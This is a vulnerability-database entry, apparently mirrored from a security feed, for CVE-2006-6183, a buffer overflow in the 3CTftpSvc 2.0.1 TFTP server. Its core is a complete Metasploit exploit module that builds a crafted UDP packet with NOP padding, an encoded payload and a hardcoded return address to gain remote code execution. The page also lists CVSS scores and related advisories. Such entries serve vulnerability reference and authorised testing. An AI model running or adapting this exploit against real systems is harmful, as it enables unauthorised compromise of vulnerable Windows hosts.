Lucene search
HistoryNov 28, 2006 - 2:41 p.m.
3CTftpSvc TFTP Long Mode Buffer Overflow
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => '3CTftpSvc TFTP Long Mode Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By
sending a specially crafted packet with an overly long mode
field, a remote attacker could overflow a buffer and execute
arbitrary code on the system.
},
'Author' => 'MC',
'References' =>
[
['CVE', '2006-6183'],
['OSVDB', '30758'],
['BID', '21301'],
['URL', 'http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ '3CTftpSvc 2.0.1', { 'Ret' => 0x00402b02 } ],
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => '2006-11-27'))
register_options([Opt::RPORT(69)])
end
def exploit
connect_udp
sploit = "\x00\x02" + rand_text_alpha_upper(1) + "\x00" + make_nops(73)
sploit << payload.encoded + [target.ret].pack('V') + make_nops(25) + "\x00"
print_status("Trying target #{target.name}...")
udp_sock.put(sploit)
disconnect_udp
end
end
Related
saint
saint
3Com TFTP server Transporting Mode buffer overflow
2006-12-08 00:00:00
3Com TFTP server Transporting Mode buffer overflow
2006-12-08 00:00:00
3Com TFTP server Transporting Mode buffer overflow
2006-12-08 00:00:00
canvas
canvas
Immunity Canvas: 3COMTFTP
2006-12-01 00:28:00
exploitdb
exploitdb
cvelist
cvelist
CVE-2006-6183
2006-12-01 00:00:00
packetstorm
packetstorm
3CTftpSvc TFTP Long Mode Buffer Overflow
2009-11-26 00:00:00
cve
cve
CVE-2006-6183
2006-12-01 00:28:00
nessus
nessus
3CTftpSvc Long Transport Mode Remote Overflow
2006-11-28 00:00:00
nvd
nvd
CVE-2006-6183
2006-12-01 00:28:00
zdt
zdt
3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta)
2007-01-21 00:00:00
openvas
openvas
3CTftpSvc TFTP Server Long Mode Buffer Overflow Vulnerability
2012-07-10 00:00:00
checkpoint_advisories
checkpoint_advisories
3Com TFTP Server Transporting Mode Remote Buffer Overflow (CVE-2006-6183)
2007-01-15 00:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Related for MSF:EXPLOIT-WINDOWS-TFTP-THREECTFTPSVC_LONG_MODE-